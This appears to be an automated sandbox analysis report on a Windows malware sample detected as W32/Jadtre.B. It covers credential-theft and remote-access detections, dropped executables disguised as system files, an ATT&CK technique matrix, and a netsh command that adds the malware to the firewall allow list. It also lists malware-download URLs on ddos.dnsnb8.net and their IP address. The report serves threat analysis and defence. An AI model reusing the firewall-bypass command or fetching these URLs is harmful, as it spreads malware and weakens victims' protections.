          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 11:58:13 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 12:32:03 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 20:11:24 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 20:45:09 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 13:15:02 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 06:49:46 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 07:34:10 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 04:42:51 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 04:05:56 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 12:37:17 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 07:26:00 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/20 | 00:10:51 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 08:21:35 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 01:36:17 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 23:53:49 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/07/26 | 09:36:29 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 10:53:00 - Program Manager
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,GetLocaleInfoA,4_2_00B37208
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 1_2_00AE1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,1_2_00AE1718
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A1820C GetTimeZoneInformation,4_2_00A1820C
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 1_2_00AE139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_00AE139F
          Source: C:\Users\user\AppData\Local\Temp\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Users\user\AppData\Local\Temp\server.exeRegistry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKSJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE
          Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
          Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Process Memory Space: RRqyIX.exe PID: 4888, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RRqyIX.exe PID: 1216, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RRqyIX.exe PID: 64, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Process Memory Space: RRqyIX.exe PID: 4888, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RRqyIX.exe PID: 1216, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RRqyIX.exe PID: 64, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting
          1
          Replication Through Removable Media
          1
          Native API
          1
          Scripting
          1
          DLL Side-Loading
          31
          Disable or Modify Tools
          11
          Input Capture
          12
          System Time Discovery
          1
          Taint Shared Content
          1
          Archive Collected Data
          2
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading
          1
          Access Token Manipulation
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory1
          Peripheral Device Discovery
          Remote Desktop Protocol11
          Input Capture
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt12
          Registry Run Keys / Startup Folder
          12
          Process Injection
          3
          Obfuscated Files or Information
          Security Account Manager4
          File and Directory Discovery
          SMB/Windows Admin Shares1
          Clipboard Data
          11
          Non-Standard Port
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook12
          Registry Run Keys / Startup Folder
          22
          Software Packing
          NTDS25
          System Information Discovery
          Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets111
          Security Software Discovery
          SSHKeylogging12
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts32
          Masquerading
          Cached Domain Credentials2
          Process Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
          Virtualization/Sandbox Evasion
          DCSync131
          Virtualization/Sandbox Evasion
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation
          Proc Filesystem1
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
          Process Injection
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481747 Sample: LisectAVT_2403002B_366.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 64 ddos.dnsnb8.net 2->64 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 Antivirus detection for URL or domain 2->74 76 12 other signatures 2->76 9 LisectAVT_2403002B_366.exe 8 2->9         started        13 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe 3 2->13         started        15 Microsoft Corporation.exe 2->15         started        17 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe 2->17         started        signatures3 process4 file5 58 C:\Users\user\AppData\Local\Temp\server.exe, PE32 9->58 dropped 60 C:\Users\user\AppData\Local\Temp\RRqyIX.exe, PE32 9->60 dropped 62 C:\Users\...\LisectAVT_2403002B_366.exe.log, ASCII 9->62 dropped 90 Detected unpacking (changes PE section rights) 9->90 92 Detected unpacking (overwrites its own PE header) 9->92 94 Hides threads from debuggers 9->94 19 server.exe 1 20 9->19         started        24 RRqyIX.exe 16 9->24         started        26 RRqyIX.exe 13->26         started        28 RRqyIX.exe 15->28         started        signatures6 process7 dnsIp8 66 127.0.0.1 unknown unknown 19->66 44 C:\system.exe, PE32 19->44 dropped 46 C:\Windows\SysWOW64xplower.exe, PE32 19->46 dropped 48 C:\Users\user\Favoritesxplower.exe, PE32 19->48 dropped 56 11 other malicious files 19->56 dropped 78 Antivirus detection for dropped file 19->78 80 Detected unpacking (changes PE section rights) 19->80 82 Drops PE files to the document folder of the user 19->82 88 5 other signatures 19->88 30 netsh.exe 2 19->30         started        68 ddos.dnsnb8.net 44.221.84.105, 49711, 49712, 49723 AMAZON-AESUS United States 24->68 50 C:\Program Files\7-Zip\Uninstall.exe, PE32 24->50 dropped 52 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 24->52 dropped 54 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 24->54 dropped 84 Machine Learning detection for dropped file 24->84 86 Infects executable files (exe, dll, sys, html) 24->86 32 WerFault.exe 22 16 24->32         started        34 cmd.exe 26->34         started        36 cmd.exe 28->36         started        file9 signatures10 process11 process12 38 conhost.exe 30->38         started        40 conhost.exe 34->40         started        42 conhost.exe 36->42         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          LisectAVT_2403002B_366.exe100%AviraW32/Jadtre.B
          LisectAVT_2403002B_366.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Program Files (x86)\Explower.exe100%AviraW32/Jadtre.B
          C:\Notepad.exe100%AviraW32/Jadtre.B
          C:\Program Files (x86)\Explower.exe100%AviraW32/Jadtre.B
          C:\Program Files (x86)\Explower.exe100%AviraW32/Jadtre.B
          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
          C:\Program Files (x86)\Explower.exe100%AviraW32/Jadtre.B
          C:\Program Files (x86)\Explower.exe100%AviraW32/Jadtre.B
          C:\Users\user\AppData\Local\Temp\RRqyIX.exe100%AviraTR/Dldr.Small.Z.haljq
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe100%AviraW32/Jadtre.B
          C:\Users\user\AppData\Local\Temp\server.exe100%AviraW32/Jadtre.B
          C:\Program Files (x86)\Explower.exe100%AviraW32/Jadtre.B
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe100%AviraW32/Jadtre.B
          C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
          C:\Program Files (x86)\Explower.exe100%AviraW32/Jadtre.B
          C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
          C:\Program Files (x86)\Explower.exe100%AviraW32/Jadtre.B
          C:\Program Files (x86)\Explower.exe100%Joe Sandbox ML
          C:\Notepad.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Explower.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Explower.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Explower.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Explower.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\RRqyIX.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\server.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Explower.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe100%Joe Sandbox ML
          C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Explower.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Explower.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://www.scintilla.org/scite.rng0%URL Reputationsafe
          http://www.rftp.comJosiah0%URL Reputationsafe
          http://www.activestate.com0%URL Reputationsafe
          http://www.activestate.comHolger0%URL Reputationsafe
          http://ddos.dnsnb8.net:799/cj//k3.rar100%URL Reputationmalware
          http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%URL Reputationsafe
          http://upx.sf.net0%URL Reputationsafe
          http://www.rftp.com0%URL Reputationsafe
          http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr0%URL Reputationsafe
          http://ddos.dnsnb8.net:799/cj//k2.rar100%URL Reputationmalware
          http://www.baanboard.comBrendon0%URL Reputationsafe
          https://www.smartsharesystems.com/0%URL Reputationsafe
          http://www.scintilla.org0%URL Reputationsafe
          http://www.spaceblue.comMathias0%URL Reputationsafe
          https://www.smartsharesystems.com/Morten0%URL Reputationsafe
          http://www.develop.com0%URL Reputationsafe
          http://pki-ocsp.symauth.com00%URL Reputationsafe
          http://www.lua.org0%URL Reputationsafe
          http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
          http://www.spaceblue.com0%URL Reputationsafe
          http://www.baanboard.com0%URL Reputationsafe
          http://www.develop.comDeepak0%URL Reputationsafe
          http://ddos.dnsnb8.net:799/cj//k2.rar86)100%Avira URL Cloudphishing
          http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
          http://www.enigmaprotector.com/openU0%Avira URL Cloudsafe
          http://ddos.dnsnb8.net:799/cj//k2.rarZ100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k1.rarM100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k1.rarzO100%Avira URL Cloudmalware
          http://ddos.dnsnb8.net:799/cj//k1.rarH100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k3.rara100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k1.rar#O100%Avira URL Cloudmalware
          http://ddos.dnsnb8.net:799/cj//k1.rar_100%Avira URL Cloudmalware
          http://ddos.dnsnb8.net:799/cj//k5.rar100%Avira URL Cloudmalware
          http://ddos.dnsnb8.net:799/cj//k1.rarPO100%Avira URL Cloudmalware
          http://ddos.dnsnb8.net:799/cj//k4.rar$100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k1.rar1100%Avira URL Cloudmalware
          http://ddos.dnsnb8.net:799/cj//k1.rareM100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k2.rar5100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k4.rar100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k1.rarn100%Avira URL Cloudmalware
          http://www.enigmaprotector.com/0%Avira URL Cloudsafe
          http://ddos.dnsnb8.net:799/cj//k2.rarE100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k2.rarR100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k1.rard100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k2.rarp6100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k3.rarx100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k1.rarc100%Avira URL Cloudphishing
          http://ddos.dnsnb8.net:799/cj//k2.rarM100%Avira URL Cloudphishing
          NameIPActiveMaliciousAntivirus DetectionReputation
          ddos.dnsnb8.net
          44.221.84.105
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://ddos.dnsnb8.net:799/cj//k3.rartrue
            • URL Reputation: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k2.rartrue
            • URL Reputation: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k5.rarfalse
            • Avira URL Cloud: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rartrue
            • URL Reputation: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k4.rarfalse
            • Avira URL Cloud: phishing
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://ddos.dnsnb8.net:799/cj//k2.rarZRRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://www.scintilla.org/scite.rngSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://www.rftp.comJosiahSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k2.rar86)RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://www.activestate.comSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://www.activestate.comHolgerSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.drfalse
            • URL Reputation: safe
            unknown
            http://www.enigmaprotector.com/openULisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A4B000.00000040.00000001.01000000.0000000C.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DERRqyIX.exe, 00000001.00000003.2148360236.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 0000000F.00000003.2336903520.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527841378.0000000000A33000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 00000016.00000002.2611797178.0000000000513000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 00000016.00000003.2607592735.00000000008E0000.00000004.00001000.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://upx.sf.netAmcache.hve.1.drfalse
            • URL Reputation: safe
            unknown
            http://www.rftp.comSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rarMRRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://ddos.dnsnb8.net:799/cj//k3.raraRRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.crLisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rarHRRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rarzORRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://www.baanboard.comBrendonSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            https://www.smartsharesystems.com/SciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://www.scintilla.orgSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://www.spaceblue.comMathiasSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rar#ORRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            https://www.smartsharesystems.com/MortenSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rar_RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k4.rar$RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rareMRRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://ddos.dnsnb8.net:799/cj//k2.rar5RRqyIX.exe, 00000001.00000002.2244767719.00000000006D6000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://www.develop.comSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://pki-ocsp.symauth.com0LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.drfalse
            • URL Reputation: safe
            unknown
            http://www.lua.orgSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rarPORRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rar1RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://www.spaceblue.comSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rarnRRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://www.baanboard.comSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k2.rarERRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://www.develop.comDeepakSciTE.exe.1.drfalse
            • URL Reputation: safe
            unknown
            http://www.enigmaprotector.com/Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A4B000.00000040.00000001.01000000.0000000C.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://ddos.dnsnb8.net:799/cj//k2.rarRRRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
            http://ddos.dnsnb8.net:799/cj//k1.rardRRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: phishing
            unknown
